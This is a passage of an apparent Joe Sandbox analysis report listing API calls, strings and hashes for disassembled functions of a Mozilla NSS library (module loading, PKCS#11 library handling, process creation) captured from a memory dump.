                                                                                                                                                                                                                                                        • Part of subcall function 6C45A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C45A94F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C486F68
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000008), ref: 6C486FA9
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4870B4
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4870C8
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D24C0,6C4C7590), ref: 6C487104
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C487117
                                                                                                                                                                                                                                                      • SECOID_Init.NSS3 ref: 6C487128
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000057), ref: 6C48714E
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C48717F
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4871A9
                                                                                                                                                                                                                                                      • PR_NotifyAllCondVar.NSS3 ref: 6C4871CF
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C4871DD
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4871EE
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C487208
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487221
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000001), ref: 6C487235
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C48724A
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C48725E
                                                                                                                                                                                                                                                      • PR_NotifyCondVar.NSS3 ref: 6C487273
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C487281
                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000), ref: 6C487291
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4872B1
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4872D4
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4872E3
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487301
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487310
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487335
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487344
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487363
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487372
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C5C0148,,defaultModDB,internalKeySlot), ref: 6C4874CC
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487513
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C48751B
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487528
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C48753C
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487550
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487561
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487572
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487583
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487594
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4875A2
                                                                                                                                                                                                                                                      • SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C4875BD
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4875C8
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4875F1
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C487636
                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000), ref: 6C487686
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C4876A2
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000050), ref: 6C4876B6
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C487707
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C48771C
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C487731
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C48774A
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6C487770
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C487779
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C48779A
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4877AC
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(-0000000D), ref: 6C4877C4
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C4877DB
                                                                                                                                                                                                                                                      • strrchr.VCRUNTIME140(?,0000002F), ref: 6C487821
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6C487837
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C48785B
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C48786F
                                                                                                                                                                                                                                                      • SECMOD_AddNewModuleEx.NSS3 ref: 6C4878AC
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4878BE
                                                                                                                                                                                                                                                      • SECMOD_AddNewModuleEx.NSS3 ref: 6C4878F3
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4878FC
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C48791C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • Spac, xrefs: 6C487389
                                                                                                                                                                                                                                                      • sql:, xrefs: 6C4876FE
                                                                                                                                                                                                                                                      • name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C4874C7
                                                                                                                                                                                                                                                      • extern:, xrefs: 6C48772B
                                                                                                                                                                                                                                                      • dll, xrefs: 6C48788E
                                                                                                                                                                                                                                                      • rdb:, xrefs: 6C487744
                                                                                                                                                                                                                                                      • NSS Internal Module, xrefs: 6C4874A2, 6C4874C6
                                                                                                                                                                                                                                                      • dbm:, xrefs: 6C487716
                                                                                                                                                                                                                                                      • ,defaultModDB,internalKeySlot, xrefs: 6C48748D, 6C4874AA
                                                                                                                                                                                                                                                      • kbi., xrefs: 6C487886
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
                                                                                                                                                                                                                                                      • String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
                                                                                                                                                                                                                                                      • API String ID: 3465160547-3797173233
                                                                                                                                                                                                                                                      • Opcode ID: c4c547b6c79fe121050a7cc6770649720d0bc5cf3f08a9c25f307871a960c193
                                                                                                                                                                                                                                                      • Instruction ID: a4bbd43e482a7678535af1245585c8077715f884b546495891264e56d4c2a694
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4c547b6c79fe121050a7cc6770649720d0bc5cf3f08a9c25f307871a960c193
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC52F0B1E063019BEF11DFA4CC19FAA7BB4AF06308F154028FD09A6B41E771E955CB96
                                                                                                                                                                                                                                                      Function 6C4ABFF0 Relevance: 75.9, APIs: 31, Strings: 12, Instructions: 624memorystringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C4AC0C8
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: LeaveCriticalSection.KERNEL32 ref: 6C5395CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C539622
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: _PR_MD_NOTIFYALL_CV.NSS3 ref: 6C53964E
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C4AC0AE
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C5391AA
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539212
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: _PR_MD_WAIT_CV.NSS3 ref: 6C53926B
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: GetLastError.KERNEL32(?,?,?,?,?,6C4605E2), ref: 6C460642
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: TlsGetValue.KERNEL32(?,?,?,?,?,6C4605E2), ref: 6C46065D
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: GetLastError.KERNEL32 ref: 6C460678
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6C46068A
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C460693
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: PR_SetErrorText.NSS3(00000000,?), ref: 6C46069D
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,FA71756D,?,?,?,?,?,6C4605E2), ref: 6C4606CA
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6C4605E2), ref: 6C4606E6
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C4AC0F2
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C4AC10E
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C4AC081
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C53945B
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C539479
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: EnterCriticalSection.KERNEL32 ref: 6C539495
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C5394E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C539532
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: LeaveCriticalSection.KERNEL32 ref: 6C53955D
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C4AC068
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: GetProcAddress.KERNEL32(?,?), ref: 6C460623
                                                                                                                                                                                                                                                      • _NSSUTIL_UTF8ToWide.NSS3(?), ref: 6C4AC14F
                                                                                                                                                                                                                                                      • PR_LoadLibraryWithFlags.NSS3 ref: 6C4AC183
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4AC18E
                                                                                                                                                                                                                                                      • PR_LoadLibrary.NSS3(?), ref: 6C4AC1A3
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C4AC1D4
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C4AC1F3
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2318,6C4ACA70), ref: 6C4AC210
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C4AC22B
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C4AC247
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C4AC26A
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C4AC287
                                                                                                                                                                                                                                                      • PR_UnloadLibrary.NSS3(?), ref: 6C4AC2D0
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_DEBUG_PKCS11_MODULE), ref: 6C4AC392
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4AC3AB
                                                                                                                                                                                                                                                      • PR_NewLogModule.NSS3(nss_mod_log), ref: 6C4AC3D1
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_FORCE_TOKEN_LOCK), ref: 6C4AC782
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6C4AC7B5
                                                                                                                                                                                                                                                      • PR_UnloadLibrary.NSS3(?), ref: 6C4AC7CC
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE097,00000000), ref: 6C4AC82E
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4AC8BF
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6C4AC8D5
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4AC900
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4AC9C7
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4AC9E5
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4ACA5A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Monitor$Value$Enter$CriticalExitSection$Error$LeaveLibrary$Alloc_SecureUtilfree$ArenaLastLoadUnloadstrcmp$AddressCallFlagsModuleOnceProcR_snprintfTextWideWithmemcpystrlen
                                                                                                                                                                                                                                                      • String ID: FC_GetFunctionList$FC_GetInterface$NSC_GetFunctionList$NSC_GetInterface$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_FORCE_TOKEN_LOCK$NSS_ReturnModuleSpecData$PKCS 11$Vendor NSS FIPS Interface$nss_mod_log
                                                                                                                                                                                                                                                      • API String ID: 4243957313-3613044529
                                                                                                                                                                                                                                                      • Opcode ID: 8fa78149976e358769a2f98d835e85fdf530f8d3a693e7b9e834e0150774b093
                                                                                                                                                                                                                                                      • Instruction ID: 9914a5ae89b6dfb806de336287ea3d49d91c5d046dd2eecbc07a9fcee54b9f11
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fa78149976e358769a2f98d835e85fdf530f8d3a693e7b9e834e0150774b093
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4429FB5A003059FDB40DF95CC46F5ABBB1FB65308F014028E8169BB29E732E956CF99
                                                                                                                                                                                                                                                      Function 6C583FC0 Relevance: 70.5, APIs: 37, Strings: 3, Instructions: 485stringprocessCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000008), ref: 6C583FD5
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C583FFE
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(-00000003), ref: 6C584016
                                                                                                                                                                                                                                                      • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6C5BFC62), ref: 6C58404A
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C58407E
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C5840A4
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C5840D7
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C584112
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000000), ref: 6C58411E
                                                                                                                                                                                                                                                      • __p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6C58414D
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C584160
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C58416C
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(?), ref: 6C5841AB
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6C5841EF
                                                                                                                                                                                                                                                      • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6C584520), ref: 6C584244
                                                                                                                                                                                                                                                      • GetEnvironmentStrings.KERNEL32 ref: 6C58424D
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C584263
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C584283
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5842B7
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5842E4
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000002), ref: 6C5842FA
                                                                                                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(?), ref: 6C584342
                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 6C5843AB
                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 6C5843B2
                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F4), ref: 6C5843B9
                                                                                                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(?), ref: 6C584403
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C584410
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6C58445E
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C58446B
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C584482
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C584492
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C5844A4
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C5844B2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE896,00000000), ref: 6C5844BE
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C5844C7
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C5844D5
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C5844EA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
                                                                                                                                                                                                                                                      • String ID: =$D$NSPR_INHERIT_FDS=
                                                                                                                                                                                                                                                      • API String ID: 3116300875-3553733109
                                                                                                                                                                                                                                                      • Opcode ID: d54afce7b9175f5d62e1973f4a5a7d0c5437ff73d0036e5ee7f8493703f0f3d6
                                                                                                                                                                                                                                                      • Instruction ID: 28369047491135e8cceb796782b65f3bc8d5fcedb49f9f93db5ed179817a8278
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d54afce7b9175f5d62e1973f4a5a7d0c5437ff73d0036e5ee7f8493703f0f3d6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B022770E063619FEB10CF69CC547AEBBB8AF16308F254128DC56ABB41D771E905CB91
                                                                                                                                                                                                                                                      Function 6C4D4840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C4B601B,?,00000000,?), ref: 6C4D486F
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C4D48A8
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C4D48BE
                                                                                                                                                                                                                                                      • NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C4D48DE
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C4D48F5
                                                                                                                                                                                                                                                      • NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C4D490A
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C4D4919
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C4D493F
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4970
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000001), ref: 6C4D49A0
                                                                                                                                                                                                                                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C4D49AD
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D49D4
                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C4D49F4
                                                                                                                                                                                                                                                      • NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C4D4A10
                                                                                                                                                                                                                                                      • NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C4D4A27
                                                                                                                                                                                                                                                      • NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C4D4A3D
